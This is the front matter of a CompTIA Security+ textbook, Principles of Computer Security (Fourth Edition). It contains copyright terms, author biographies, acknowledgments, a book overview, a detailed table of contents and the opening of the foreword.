Copyright © 2016 by McGraw-Hill Education. All rights reserved. Except as permitted under the United States Copyright Act of 1976, no part of this publication may be reproduced or distributed in any form or by any means, or stored in a database or retrieval system, without the prior written permission of the publisher, with the exception that the program listings may be entered, stored, and executed in a computer system, but they may not be reproduced for publication.
ISBN: 978-0-07-183597-8 MHID: 0-07-183597-0
The material in this eBook also appears in the print version of this title: ISBN: 978-0-07-183601-2, MHID: 0-07-183601-2.
eBook conversion by codeMantra Version 1.0
All trademarks are trademarks of their respective owners. Rather than put a trademark symbol after every occurrence of a trademarked name, we use names in an editorial fashion only, and to the benefit of the trademark owner, with no intention of infringement of the trademark. Where such designations appear in this book, they have been printed with initial caps.
McGraw-Hill Education eBooks are available at special quantity discounts to use as premiums and sales promotions or for use in corporate training programs. To contact a representative, please visit the Contact Us page at www.mhprofessional.com.
SANS Institute IT Code of Ethics reproduced with permission, © SANS Institute.
Information has been obtained by McGraw-Hill Education from sources believed to be reliable. However, because of the possibility of human or mechanical error by our sources, McGraw-Hill Education, or others, McGraw-Hill Education does not guarantee the accuracy, adequacy, or completeness of any information and is not responsible for any errors or omissions or the results obtained from the use of such information.
McGraw-Hill Education is an independent entity from CompTIA®. This publication and digital content may be used in assisting students to prepare for the CompTIA Security+ exam. Neither CompTIA nor McGraw-Hill Education warrants that use of this publication and digital content will ensure passing any exam. CompTIA and CompTIA Security+ are trademarks or registered trademarks of CompTIA in the United States and/or other countries. All other trademarks are trademarks of their respective owners.
TERMS OF USE
This is a copyrighted work and McGraw-Hill Education and its licensors reserve all rights in and to the work. Use of this work is subject to these terms. Except as permitted under the Copyright Act of 1976 and the right to store and retrieve one copy of the work, you may not decompile, disassemble, reverse engineer, reproduce, modify, create derivative works based upon, transmit, distribute, disseminate, sell, publish or sublicense the work or any part of it without McGraw-Hill Education’s prior consent. You may use the work for your own noncommercial and personal use; any other use of the work is strictly prohibited. Your right to use the work may be terminated if you fail to comply with these terms.
THE WORK IS PROVIDED “AS IS.” McGRAW-HILL EDUCATION AND ITS LICENSORS MAKE NO GUARANTEES OR WARRANTIES AS TO THE ACCURACY, ADEQUACY OR COMPLETENESS OF OR RESULTS TO BE OBTAINED FROM USING THE WORK, INCLUDING ANY INFORMATION THAT CAN BE ACCESSED THROUGH THE WORK VIA HYPERLINK OR OTHERWISE, AND EXPRESSLY DISCLAIM ANY WARRANTY, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO IMPLIED WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE. McGraw-Hill Education and its licensors do not warrant or guarantee that the functions contained in the work will meet your requirements or that its operation will be uninterrupted or error free. Neither McGraw-Hill Education nor its licensors shall be liable to you or anyone else for any inaccuracy, error or omission, regardless of cause, in the work or for any damages resulting therefrom. McGraw-Hill Education has no responsibility for the content of any information accessed through the work. Under no circumstances shall McGraw-Hill Education and/or its licensors be liable for any indirect, incidental, special, punitive, consequential or similar damages that result from the use of or inability to use the work, even if any of them has been advised of the possibility of such damages. This limitation of liability shall apply to any claim or cause whatsoever whether such claim or cause arises in contract, tort or otherwise.
About the Authors
Dr. Wm. Arthur Conklin is an associate professor and Director of the Center for Information Security Research and Education in the College of Technology at the University of Houston. He holds two terminal degrees, a Ph.D. in Business Administration (specializing in Information Security) from The University of Texas at San Antonio (UTSA) and the degree Electrical Engineer (specializing in Space Systems Engineering) from the Naval Postgraduate School in Monterey, CA. He holds CompTIA Security+, CISSP, CSSLP, CRISC, DFCP, GICSP, and CASP certifications. An ISSA Fellow, he is also a senior member of ASQ and a member of IEEE and ACM. His research interests include the use of systems theory to explore information security, specifically in cyber-physical systems. He has coauthored six security books and numerous academic articles associated with information security. He is active in the DHS-sponsored Industrial Control Systems Joint Working Group (ICSJWG) efforts associated with workforce development and cybersecurity aspects of industrial control systems. He has an extensive background in secure coding and is a former co-chair of the DHS/DoD Software Assurance Forum working group for workforce education, training, and development.
Dr. Gregory White has been involved in computer and network security since 1986. He spent 19 years on active duty with the U.S. Air Force and is currently in the Air Force Reserves assigned to the Pentagon. He obtained his Ph.D. in Computer Science from Texas A&M University in 1995. His dissertation topic was in the area of computer network intrusion detection, and he continues to conduct research in this area today. He is currently the Director for the Center for Infrastructure Assurance and Security and is an associate professor of computer science at The University of Texas at San Antonio. Dr. White has written and presented numerous articles and conference papers on security. He is also the coauthor for five textbooks on computer and network security and has written chapters for two other security books. Dr. White continues to be active in security research. His current research initiatives include efforts in high-speed intrusion detection, community infrastructure protection, and visualization of community and organization security postures.
Dwayne Williams is Associate Director, Special Projects for the Center for Infrastructure Assurance and Security (CIAS) at the University of Texas at San Antonio and has more than 22 years of experience in information systems and network security. Mr. Williams’s experience includes six years of commissioned military service as a Communications-Computer Information Systems Officer in the U.S. Air Force, specializing in network security, corporate information protection, intrusion detection systems, incident response, and VPN technology. Prior to joining the CIAS, he served as Director of Consulting for SecureLogix Corporation, where he directed and provided security assessment and integration services to Fortune 100, government, public utility, oil and gas, financial, and technology clients. Mr. Williams graduated in 1993 from Baylor University with a Bachelor of Arts in Computer Science. Mr. Williams is a Certified Information Systems Security Professional (CISSP), CompTIA Advanced Security Practitioner (CASP), and coauthor of McGraw-Hill’s Voice and Data Security, CompTIA Security+ All-in-One Exam Guide, and CASP CompTIA Advanced Security Practitioner Certification Study Guide.
Roger L. Davis, CISSP, CISM, CISA, is an Account Manager for Microsoft. He has served as president of the Utah chapter of the Information Systems Security Association (ISSA) and various board positions for the Utah chapter of the Information Systems Audit and Control Association (ISACA). He is a retired Air Force lieutenant colonel with 35 years of military and information systems/security experience. Mr. Davis served on the faculty of Brigham Young University and the Air Force Institute of Technology. He coauthored McGraw-Hill’s CompTIA Security+ All-in-One Exam Guide and Voice and Data Security. He holds a Master’s degree in Computer Science from George Washington University, a Bachelor’s degree in Computer Science from Brigham Young University, and performed post-graduate studies in electrical engineering and computer science at the University of Colorado.
Chuck Cothren, CISSP, is a Principal Solutions Specialist at Symantec Corporation applying a wide array of network security experience, including performing controlled penetration testing, incident response, and security management to assist a wide variety of clients in the protection of their critical data. He has also analyzed security methodologies for Voice over Internet Protocol (VoIP) systems and supervisory control and data acquisition (SCADA) systems. He is coauthor of the books Voice and Data Security, and CompTIA Security+ All-in-One Exam Guide.
About the Technical Editor
Bobby E. Rogers is an Information Security Engineer working as a contractor for Department of Defense agencies, helping to secure, certify, and accredit their information systems. His duties include information system security engineering, risk management, and certification and accreditation efforts. He retired after 21 years in the United States Air Force, serving as a network security engineer and instructor, and has secured networks all over the world. Bobby has a Master’s degree in Information Assurance (IA), and is pursuing a doctoral degree in Cybersecurity from Capitol Technology University, Maryland. His many certifications include CRISC, CISSP-ISSEP, C|EH, and MCSE: Security as well as the CompTIA A+, Network+, Security+, and Mobility+ certifications.
Acknowledgments
This book is dedicated to the many security professionals who daily work to ensure the safety of our nation’s critical infrastructures. We want to recognize the thousands of dedicated individuals who strive to protect our national assets but who seldom receive praise and often are only noticed when an incident occurs. To you, we say thank you for a job well done!
We, the authors of Principles of Computer Security, Fourth Edition, have many individuals who we need to acknowledge—individuals without whom this effort would not have been successful. This edition would not have been possible without Tim Green, whose support and faith in the authors made this edition possible. He brought together an all-star production team that made this book more than just a new edition, but a complete learning system. The list needs to start with those folks at McGraw-Hill Education who worked tirelessly with the project’s multiple authors and contributors and led us successfully through the minefield that is a book schedule and who took our rough chapters and drawings and turned them into a final, professional product we can be proud of. We thank all the good people from the Acquisitions team, Tim Green and Amy Stonebraker; from the Editorial Services team, Jody McKenzie and Howie Severson; from the Illustration and Production teams, James Kussow and Amarjeet Kumar and the composition team at Cenveo Publisher Services. We also thank the technical editor, Bobby Rogers; the copy editor, Bill McManus; the proofreader, Paul Tyler; and the indexer, Jack Lewis; for all their attention to detail that made this a finer work after they finished with it. We also need to acknowledge our current employers who, to our great delight, have seen fit to pay us to work in a career field that we all find exciting and rewarding. There is never a dull moment in security, because it is constantly changing. We would like to thank Art Conklin for herding the cats on this one.
Finally, we would each like to individually thank those people who—on a personal basis—have provided the core support for us individually. Without these special people in our lives, none of us could have put this work together.
—The Author Team
To Susan, your love and support is what enables me to do all the things I do.
—Art Conklin, Ph.D.
I would like to thank my wife, Charlan, for the tremendous support she has always given me. It doesn’t matter how many times I have sworn that I’ll never get involved with another book project only to return within months to yet another one; through it all, she has remained supportive. I would also like to publicly thank the United States Air Force, which provided me numerous opportunities since 1986 to learn more about security than I ever knew existed. To whoever it was who decided to send me as a young captain—fresh from completing my master’s degree in artificial intelligence—to my first assignment in computer security: thank you, it has been a great adventure!
—Gregory B. White, Ph.D.
Josie, thank you for all the love and support. Macon, John, this is for you.
—Chuck Cothren
Geena, thanks for being my best friend and my greatest support. Anything I am is because of you. Love to my kids and grandkids!
—Roger L. Davis
To my wife and best friend, Leah, for your love, energy, and support—thank you for always being there. Here’s to many more years together.
—Dwayne Williams
ABOUT THIS BOOK
Important Technology Skills
Information technology (IT) offers many career paths, and information security is one of the fastest-growing tracks for IT professionals. This book provides coverage of the materials you need to begin your exploration of information security. In addition to covering all of the CompTIA Security+ exam objectives, additional material is included to help you build a solid introductory knowledge of information security.
Proven Learning Method Keeps You on Track
Designed for classroom use and written by instructors for use in their own classes, Principles of Computer Security is structured to give you comprehensive knowledge of information security. The textbook’s active learning methodology guides you beyond mere recall and—through thought-provoking activities, labs, and sidebars—helps you develop critical-thinking, diagnostic, and communication skills.
Effective Learning Tools
This feature-rich textbook is designed to make learning easy and enjoyable and to help you develop the skills and critical-thinking abilities that will enable you to adapt to different job situations and to troubleshoot problems. Written by instructors with decades of combined information security experience, this book conveys even the most complex issues in an accessible, easy-to-understand format.
Each chapter includes
Learning Objectives that set measurable goals for chapter-by-chapter progress
Illustrations that give you a clear picture of the concepts and technologies
Try This!, Cross Check, and Tech Tip sidebars that encourage you to practice and apply concepts in real-world settings
Notes, Tips, and Warnings that guide you, and Exam Tips that give you advice or provide information specifically related to preparing for the exam
Chapter Summaries and Key Terms Lists that provide you with an easy way to review important concepts and vocabulary
Challenging End-of-Chapter Tests that include vocabulary-building exercises, multiple-choice questions, essay questions, and on-the-job lab projects
CompTIA APPROVED QUALITY CONTENT
It Pays to Get Certified
In a digital world, digital literacy is an essential survival skill. Certification demonstrates that you have the knowledge and skill to solve technical or business problems in virtually any business environment. CompTIA certifications are highly valued credentials that qualify you for jobs, increased compensation, and promotion.
CompTIA Security+ Certification Helps Your Career
Security is one of the highest demand job categories, growing in importance as the frequency and severity of security threats continues to be a major concern for organizations around the world.
Jobs for security administrators are expected to increase by 18%—the skill set required for these types of jobs maps to the CompTIA Security+ certification.
Network Security Administrators can earn as much as $106,000 per year.
CompTIA Security+ is the first step in starting your career as a Network Security Administrator or Systems Security Administrator.
More than 250,000 individuals worldwide are CompTIA Security+ certified.
CompTIA Security+ is regularly used in organizations such as Hitachi Systems, Fuji Xerox, HP, Dell, and a variety of major U.S. government contractors.
Approved by the U.S. Department of Defense (DoD) as one of the required certification options in the DoD 8570.01-M directive, for Information Assurance Technical Level II and Management Level I job roles.
Steps to Getting Certified and Staying Certified
1. Review the exam objectives. Review the certification objectives to make sure you know what is covered in the exam: http://certification.comptia.org/examobjectives.aspx
2. Practice for the exam. After you have studied for the certification exam, review and answer sample questions to get an idea of what type of questions might be on the exam: http://certification.comptia.org/samplequestions.aspx
3. Purchase an exam voucher. You can purchase exam vouchers on the CompTIA Marketplace, www.comptiastore.com.
4. Take the test! Go to the Pearson VUE website, www.pearsonvue.com/comptia/, and schedule a time to take your exam.
5. Stay certified! Effective January 1, 2011, new CompTIA Security+ certifications are valid for three years from the date of certification. There are a number of ways the certification can be renewed. For more information go to http://certification.comptia.org/ce.
For More Information
Visit CompTIA online. Go to http://certification.comptia.org/home.aspx to learn more about getting CompTIA certified.
Contact CompTIA. Please call 866-835-8020 and choose Option 2, or e-mail [email protected].
Connect with CompTIA. Find CompTIA on Facebook, LinkedIn, Twitter, and YouTube.
Content Seal of Quality
This courseware bears the seal of CompTIA Approved Quality Content. This seal signifies this content covers 100 percent of the exam objectives and implements important instructional design principles. CompTIA recommends multiple learning tools to help increase coverage of the learning objectives.
CAQC Disclaimer
The logo of the CompTIA Approved Quality Content (CAQC) program and the status of this or other training material as “Approved” under the CompTIA Approved Quality Content program signifies that, in CompTIA’s opinion, such training material covers the content of CompTIA’s related certification exam. The contents of this training material were created for the CompTIA Security+ exam covering CompTIA certification objectives that were current as of the date of publication. CompTIA has not reviewed or approved the accuracy of the contents of this training material and specifically disclaims any warranties of merchantability or fitness for a particular purpose. CompTIA makes no guarantee concerning the success of persons using any such “Approved” or other training material in order to prepare for any CompTIA certification exam.
CONTENTS AT A GLANCE
Chapter 1 Introduction and Security Trends
Chapter 2 General Security Concepts
Chapter 3 Operational and Organizational Security
Chapter 4 The Role of People in Security
Chapter 5 Cryptography
Chapter 6 Public Key Infrastructure
Chapter 7 PKI Standards and Protocols
Chapter 8 Physical Security
Chapter 9 Network Fundamentals
Chapter 10 Infrastructure Security
Chapter 11 Authentication and Remote Access
Chapter 12 Wireless Security and Mobile Devices
Chapter 13 Intrusion Detection Systems and Network Security
Chapter 14 System Hardening and Baselines
Chapter 15 Types of Attacks and Malicious Software
Chapter 16 E-Mail and Instant Messaging
Chapter 17 Web Components
Chapter 18 Secure Software Development
Chapter 19 Business Continuity and Disaster Recovery, and Organizational Policies
Chapter 20 Risk Management
Chapter 21 Change Management
Chapter 22 Incident Response
Chapter 23 Computer Forensics
Chapter 24 Legal Issues and Ethics
Chapter 25 Privacy
Appendix A CompTIA Security+ Exam Objectives: SY0-401
Appendix B About the Download
Glossary
Index
CONTENTS
Foreword
Preface
Introduction
Instructor Web Site

Chapter 1 Introduction and Security Trends
The Computer Security Problem
Definition of Computer Security
Historical Security Incidents
The Current Threat Environment
Threats to Security
Security Trends
Targets and Attacks
Specific Target
Opportunistic Target
Minimizing Possible Avenues of Attack
Approaches to Computer Security
Ethics
Additional References
Chapter 1 Review

Chapter 2 General Security Concepts
Basic Security Terminology
Security Basics
Security Tenets
Security Approaches
Security Principles
Access Control
Authentication Mechanisms
Authentication and Access Control Policies
Security Models
Confidentiality Models
Integrity Models
Chapter 2 Review

Chapter 3 Operational and Organizational Security
Policies, Procedures, Standards, and Guidelines
Security Policies
Change Management Policy
Data Policies
Human Resources Policies
Due Care and Due Diligence
Due Process
Incident Response Policies and Procedures
Security Awareness and Training
Security Policy Training and Procedures
Role-Based Training
Compliance with Laws, Best Practices, and Standards
User Habits
New Threats and Security Trends/Alerts
Training Metrics and Compliance
Interoperability Agreements
Service Level Agreements
Business Partnership Agreement
Memorandum of Understanding
Interconnection Security Agreement
The Security Perimeter
Physical Security
Physical Access Controls
Physical Barriers
Environmental Issues
Fire Suppression
Wireless
Electromagnetic Eavesdropping
Modern Eavesdropping
Chapter 3 Review

Chapter 4 The Role of People in Security
People—A Security Problem
Social Engineering
Poor Security Practices
People as a Security Tool
Security Awareness
Security Policy Training and Procedures
Chapter 4 Review

Chapter 5 Cryptography
Cryptography in Practice
Fundamental Methods
Comparative Strengths and Performance of Algorithms
Historical Perspectives
Substitution Ciphers
One-Time Pads
Algorithms
Key Management
Random Numbers
Hashing Functions
SHA
RIPEMD
Message Digest
Hashing Summary
Symmetric Encryption
DES
3DES
AES
CAST
RC
Blowfish
Twofish
IDEA
Block vs. Stream
Symmetric Encryption Summary
Asymmetric Encryption
Diffie-Hellman
RSA
ElGamal
ECC
Asymmetric Encryption Summary
Symmetric vs. Asymmetric
Quantum Cryptography
Steganography
Cryptography Algorithm Use
Confidentiality
Integrity
Authentication
Nonrepudiation
Cipher Suites
Key Exchange
Key Escrow
Session Keys
Ephemeral Keys
Key Stretching
Secrecy Principles
Transport Encryption
Digital Signatures
Digital Rights Management
Cryptographic Applications
Use of Proven Technologies
Chapter 5 Review

Chapter 6 Public Key Infrastructure
The Basics of Public Key Infrastructures
Certificate Authorities
Registration Authorities
Local Registration Authorities
Digital Certificates
Certificate Extensions
Certificate Attributes
Certificate Lifecycles
Registration and Generation
CSR
Renewal
Suspension
Revocation
Key Destruction
Certificate Repositories
Trust and Certificate Verification
Centralized and Decentralized Infrastructures
Hardware Security Modules
Private Key Protection
Key Recovery
Key Escrow
Public Certificate Authorities
In-House Certificate Authorities
Choosing Between a Public CA and an In-House CA
Outsourced Certificate Authorities
Tying Different PKIs Together
Trust Models
Certificate-Based Threats
Stolen Certificates
Chapter 6 Review

Chapter 7 PKI Standards and Protocols
PKIX and PKCS
PKIX Standards
PKCS
Why You Need to Know the PKIX and PKCS Standards
X.509
SSL/TLS
Cipher Suites
ISAKMP
CMP
XKMS
S/MIME
IETF S/MIME History
IETF S/MIME v3 Specifications
PGP
How PGP Works
HTTPS
IPsec
CEP
Other Standards
FIPS
Common Criteria
WTLS
ISO/IEC 27002 (Formerly ISO 17799)
SAML
Chapter 7 Review

Chapter 8 Physical Security
The Security Problem
Physical Security Safeguards
Walls and Guards
Physical Access Controls and Monitoring
Convergence
Policies and Procedures
Environmental Controls
Fire Suppression
Water-Based Fire Suppression Systems
Halon-Based Fire Suppression Systems
Clean-Agent Fire Suppression Systems
Handheld Fire Extinguishers
Fire Detection Devices
Power Protection
UPS
Backup Power and Cable Shielding
Electromagnetic Interference
Electronic Access Control Systems
Access Tokens
Chapter 8 Review

Chapter 9 Network Fundamentals
Network Architectures
Network Topology
Network Protocols
Protocols
Packets
Internet Protocol
IP Packets
TCP vs. UDP
ICMP
IPv4 vs. IPv6
Packet Delivery
Ethernet
Local Packet Delivery
Remote Packet Delivery
IP Addresses and Subnetting
Network Address Translation
Security Zones
DMZ
Internet
Intranet
Extranet
Flat Networks
Enclaves
VLANs
Zones and Conduits
Tunneling
Storage Area Networks
iSCSI
Fibre Channel
FCoE
Chapter 9 Review

Chapter 10 Infrastructure Security
Devices
Workstations
Servers
Virtualization
Mobile Devices
Device Security, Common Concerns
Network Attached Storage
Removable Storage
Networking
Network Interface Cards
Hubs
Bridges
Switches
Routers
Firewalls
How Do Firewalls Work?
Next-Generation Firewalls
Web Application Firewalls vs. Network Firewalls
Concentrators
Wireless Devices
Modems
Telephony
VPN Concentrator
Security Devices
Intrusion Detection Systems
Network Access Control
Network Monitoring/Diagnostic
Load Balancers
Proxies
Web Security Gateways
Internet Content Filters
Data Loss Prevention
Unified Threat Management
Media
Coaxial Cable
UTP/STP
Fiber
Unguided Media
Removable Media
Magnetic Media
Optical Media
Electronic Media
Security Concerns for Transmission Media
Physical Security Concerns
Cloud Computing
Private
Public
Hybrid
Community
Software as a Service
Platform as a Service
Infrastructure as a Service
Chapter 10 Review

Chapter 11 Authentication and Remote Access
User, Group, and Role Management
User
Group
Role
Password Policies
Domain Password Policy
Single Sign-On
Time of Day Restrictions
Tokens
Account and Password Expiration
Security Controls and Permissions
Access Control Lists
Mandatory Access Control (MAC)
Discretionary Access Control (DAC)
Role-Based Access Control (RBAC)
Rule-Based Access Control
Attribute Based Access Control (ABAC)
Account Expiration
Preventing Data Loss or Theft
The Remote Access Process
Identification
Authentication
Authorization
Access Control
Remote Access Methods
IEEE 802.1X
RADIUS
TACACS+
Authentication Protocols
FTP/FTPS/SFTP
VPNs
IPsec
Vulnerabilities of Remote Access Methods
Connection Summary
Chapter 11 Review

Chapter 12 Wireless Security and Mobile Devices
Introduction to Wireless Networking
Mobile Phones
Wireless Application Protocol
3G Mobile Networks
4G Mobile Networks
Bluetooth
Bluetooth Attacks
Near Field Communication
IEEE 802.11 Series
802.11: Individual Standards
Attacking 802.11
Current Security Methods
Wireless Systems Configuration
Antenna Types
Antenna Placement
Power Level Controls
Site Surveys
Captive Portals
Securing Public Wi-Fi
Mobile Devices
Mobile Device Security
BYOD Concerns
Location Services
Mobile Application Security
Chapter 12 Review

Chapter 13 Intrusion Detection Systems and Network Security
History of Intrusion Detection Systems
IDS Overview
IDS Models
Signatures
False Positives and False Negatives
Network-Based IDSs
Advantages of a NIDS
Disadvantages of a NIDS
Active vs. Passive NIDSs
NIDS Tools
Host-Based IDSs
Advantages of HIDSs
Disadvantages of HIDSs
Active vs. Passive HIDSs
Resurgence and Advancement of HIDSs
Intrusion Prevention Systems
Honeypots and Honeynets
Tools
Protocol Analyzer
Switched Port Analyzer
Port Scanner
Passive vs. Active Tools
Banner Grabbing
Chapter 13 Review

Chapter 14 System Hardening and Baselines
Overview of Baselines
Operating System and Network Operating System Hardening
OS Security
Host Security
Machine Hardening
Operating System Security and Settings
OS Hardening
Hardening Microsoft Operating Systems
Hardening UNIX- or Linux-Based Operating Systems
Updates (a.k.a. Hotfixes, Service Packs, and Patches)
Antimalware
White Listing vs. Black Listing Applications
Trusted OS
Host-based Firewalls
Hardware Security
Host Software Baselining
Host-Based Security Controls
Hardware-Based Encryption Devices
Data Encryption
Data Security
Handling Big Data
Cloud Storage
Storage Area Network
Permissions/ACL
Network Hardening
Software Updates
Device Configuration
Securing Management Interfaces
VLAN Management
IPv4 vs. IPv6
Application Hardening
Application Configuration Baseline
Application Patches
Patch Management
Host Software Baselining
Group Policies
Security Templates
Alternative Environments
SCADA
Embedded Systems
Phones and Mobile Devices
Mainframe
Game Consoles
In-Vehicle Computing Systems
Alternative Environment Methods
Network Segmentation
Security Layers
Application Firewalls
Manual Updates
Firmware Version Control
Wrappers
Control Redundancy and Diversity
Chapter 14 Review

Chapter 15 Types of Attacks and Malicious Software
Avenues of Attack
Minimizing Possible Avenues of Attack
Malicious Code
Viruses
Worms
Polymorphic Malware
Trojan Horses
Rootkits
Logic Bombs
Spyware
Adware
Botnets
Backdoors and Trapdoors
Ransomware
Malware Defenses
Attacking Computer Systems and Networks
Denial-of-Service Attacks
Social Engineering
Null Sessions
Sniffing
Spoofing
TCP/IP Hijacking
Man-in-the-Middle Attacks
Replay Attacks
Transitive Access
Spam
Spim
Phishing
Spear Phishing
Vishing
Pharming
Scanning Attacks
Attacks on Encryption
Address System Attacks
Cache Poisoning
Password Guessing
Pass-the-Hash Attacks
Software Exploitation
Client-Side Attacks
Advanced Persistent Threat
Remote Access Trojans
Tools
Metasploit
BackTrack/Kali
Social-Engineering Toolkit
Cobalt Strike
Core Impact
Burp Suite
Auditing
Perform Routine Audits
Chapter 15 Review

Chapter 16 E-Mail and Instant Messaging
How E-Mail Works
E-Mail Structure
MIME
Security of E-Mail
Malicious Code
Hoax E-Mails
Unsolicited Commercial E-Mail (Spam)
Sender ID Framework
DomainKeys Identified Mail
Mail Encryption
S/MIME
PGP
Instant Messaging
Modern Instant Messaging Systems
Chapter 16 Review

Chapter 17 Web Components
Current Web Components and Concerns
Web Protocols
Encryption (SSL and TLS)
The Web (HTTP and HTTPS)
HTTPS Everywhere
HTTP Strict Transport Security
Directory Services (DAP and LDAP)
File Transfer (FTP and SFTP)
Vulnerabilities
Code-Based Vulnerabilities
Buffer Overflows
Java
JavaScript
ActiveX
Securing the Browser
CGI
Server-Side Scripts
Cookies
Browser Plug-ins
Malicious Add-ons
Signed Applets
Application-Based Weaknesses
Session Hijacking
Client-Side Attacks
Web 2.0 and Security
Chapter 17 Review

Chapter 18 Secure Software Development
The Software Engineering Process
Process Models
Secure Development Lifecycle
Secure Coding Concepts
Error and Exception Handling
Input and Output Validation
Fuzzing
Bug Tracking
Application Attacks
Cross-Site Scripting
Injections
Directory Traversal/Command Injection
Buffer Overflow
Integer Overflow
Cross-Site Request Forgery
Zero-Day
Attachments
Locally Shared Objects
Client-Side Attacks
Arbitrary/Remote Code Execution
Open Vulnerability and Assessment Language
Application Hardening
Application Configuration Baseline
Application Patch Management
NoSQL Databases vs. SQL Databases
Server-Side vs. Client-Side Validation
Chapter 18 Review

Chapter 19 Business Continuity and Disaster Recovery, and Organizational Policies
Business Continuity
Business Continuity Plans
Business Impact Analysis
Identification of Critical Systems and Components
Removing Single Points of Failure
Risk Assessment
Succession Planning
Continuity of Operations
Disaster Recovery
Disaster Recovery Plans/Process
Categories of Business Functions
IT Contingency Planning
Test, Exercise, and Rehearse
Recovery Time Objective and Recovery Point Objective
Backups
Alternative Sites
Utilities
Secure Recovery
Cloud Computing
High Availability and Fault Tolerance
Failure and Recovery Timing
Chapter 19 Review

Chapter 20 Risk Management
An Overview of Risk Management
Example of Risk Management at the International Banking Level
Risk Management Vocabulary
What Is Risk Management?
Risk Management Culture
Business Risks
Examples of Business Risks
Examples of Technology Risks
Risk Mitigation Strategies
Change Management
Incident Management
User Rights and Permissions Reviews
Data Loss or Theft
Risk Management Models
General Risk Management Model
Software Engineering Institute Model
NIST Risk Models
Model Application
Qualitatively Assessing Risk
Quantitatively Assessing Risk
Adding Objectivity to a Qualitative Assessment
Risk Calculation
Qualitative vs. Quantitative Risk Assessment
Tools
Cost-Effectiveness Modeling
Risk Management Best Practices
System Vulnerabilities
Threat Vectors
Probability/Threat Likelihood
Risk-Avoidance, Transference, Acceptance, Mitigation, Deterrence
Risks Associated with Cloud Computing and Virtualization
Chapter 20 Review

Chapter 21 Change Management
Why Change Management?
The Key Concept: Separation of Duties
Elements of Change Management
Implementing Change Management
Back-out Plan
The Purpose of a Change Control Board
Code Integrity
The Capability Maturity Model Integration
Chapter 21 Review

Chapter 22 Incident Response
Foundations of Incident Response
Incident Management
Anatomy of an Attack
Goals of Incident Response
Incident Response Process
Preparation
Security Measure Implementation
Incident Identification/Detection
Initial Response
Incident Isolation
Strategy Formulation
Investigation
Recovery/Reconstitution Procedures
Reporting
Follow-up/Lessons Learned
Standards and Best Practices
State of Compromise
NIST
Department of Justice
Indicators of Compromise
Cyber Kill Chain
Making Security Measurable
Chapter 22 Review

Chapter 23 Computer Forensics
Evidence
Types of Evidence
Standards for Evidence
Three Rules Regarding Evidence
Forensic Process
Acquiring Evidence
Identifying Evidence
Protecting Evidence
Transporting Evidence
Storing Evidence
Conducting the Investigation
Analysis
Chain of Custody
Message Digest and Hash
Host Forensics
File Systems
Windows Metadata
Linux Metadata
Device Forensics
Network Forensics
E-Discovery
Reference Model
Big Data
Cloud
Chapter 23 Review

Chapter 24 Legal Issues and Ethics
Cybercrime
Common Internet Crime Schemes
Sources of Laws
Computer Trespass
Significant U.S. Laws
Payment Card Industry Data Security Standard (PCI DSS)
Import/Export Encryption Restrictions
Non-U.S. Laws
Digital Signature Laws
Digital Rights Management
Ethics
Chapter 24 Review

Chapter 25 Privacy
Personally Identifiable Information (PII)
Sensitive PII
Notice, Choice, and Consent
U.S. Privacy Laws
Privacy Act of 1974
Freedom of Information Act (FOIA)
Family Education Records and Privacy Act (FERPA)
U.S. Computer Fraud and Abuse Act (CFAA)
U.S. Children’s Online Privacy Protection Act (COPPA)
Video Privacy Protection Act (VPPA)
Health Insurance Portability & Accountability Act (HIPAA)
Gramm-Leach-Bliley Act (GLBA)
California Senate Bill 1386 (SB 1386)
U.S. Banking Rules and Regulations
Payment Card Industry Data Security Standard (PCI DSS)
Fair Credit Reporting Act (FCRA)
Fair and Accurate Credit Transactions Act (FACTA)
Non-Federal Privacy Concerns in the United States
International Privacy Laws
OECD Fair Information Practices
European Laws
Canadian Laws
Asian Laws
Privacy-Enhancing Technologies
Privacy Policies
Privacy Impact Assessment
Web Privacy Issues
Cookies
Privacy in Practice
User Actions
Data Breaches
Chapter 25 Review

Appendix A CompTIA Security+ Exam Objectives: SY0-401

Appendix B About the Download
System Requirements
Downloading Total Tester Premium Practice Exam Software
Total Tester Premium Practice Exam Software
Installing and Running Total Tester
Technical Support
Total Seminars Technical Support
McGraw-Hill Education Content Support

Glossary
Index
FOREWORD
Selecting a book is tricky for me. If it is for personal reading, will I like reading it? If it is for my professional development, will it meet the need? If it is for my students, will it be clear and concise? This new edition of Principles of Computer Security passes all three tests with flying colors. I enjoyed reading it. If I needed to pass the CompTIA Security+ or other practitioner examination, it would prepare me. And finally, based on personal experience, students will like this book and find it to be valuable reading and study material. It even has practice exams for certification for my convenience.
For more than 40 years I have worked in some variety of computer security. When people ask me what defines my job, I respond with "I don't know until I read the morning newspaper because the security environment changes rapidly." If you want to get into the computer security industry, reading and understanding this book is a great introduction. Now in its fourth edition, the 25 chapters of Principles of Computer Security focus on a broad spectrum of important topics to prepare the reader to be a certified computer security practitioner. The real deal maker for me is the further endorsement of the contents: the book is based on CompTIA Approved Quality Content (CAQC) and serves as both an exam preparation guide and a useful reference.
Dr. Conklin and his team of coauthors ease the reader into the meat of the topic by reviewing both security trends and concepts. They then address security from two different perspectives. First they focus on the organization's need for security, and then focus on the important role of people. These two perspectives are intertwined; it is essential for a security practitioner to understand the security environment and how the people make it work.
Every practitioner needs to understand the underlying technology and tools of computer security. Some individuals have an idea about security topics but do not have the essential knowledge needed to address them in depth. The authors have provided nine masterful chapters introducing these key concepts. For example, in a single chapter they provide the basis for the reader to deal with security of networks. This chapter supports everything the reader needs to know to address standards and protocols, infrastructure security, remote access and authentication, as well as wireless. The authors integrate these concepts to support public key infrastructure (PKI) and intrusion detection systems for network security without forgetting the importance of physical security in protecting the information system as well as infrastructure.
One of the most debated topics in security is the importance of cryptography. Some would assert that almost all digital security can be accomplished with cryptography, that security and cryptography are inseparable, with cryptography being the cornerstone of securing data in both transmission and storage. However, if computer security were as easy as "encrypt everything," this would be a very short book. While cryptography is very important and a very complex security measure, it is not a panacea—but it does provide for lively discussions. The authors bring all these components together with a comprehensive chapter on intrusion detection and prevention.
Once the reader has mastered the basics, the authors address e-mail, malicious software, instant messaging, and web components in such a way that the reader can apply his or her knowledge of networks and security fundamentals. The reader will then be provided with an overview of secure software development. In 2015, both the U.S. Department of Homeland Security and CSO magazine concluded that poorly developed software is one of the biggest cyber threats—perhaps 90 percent of the threats come through poor software design.
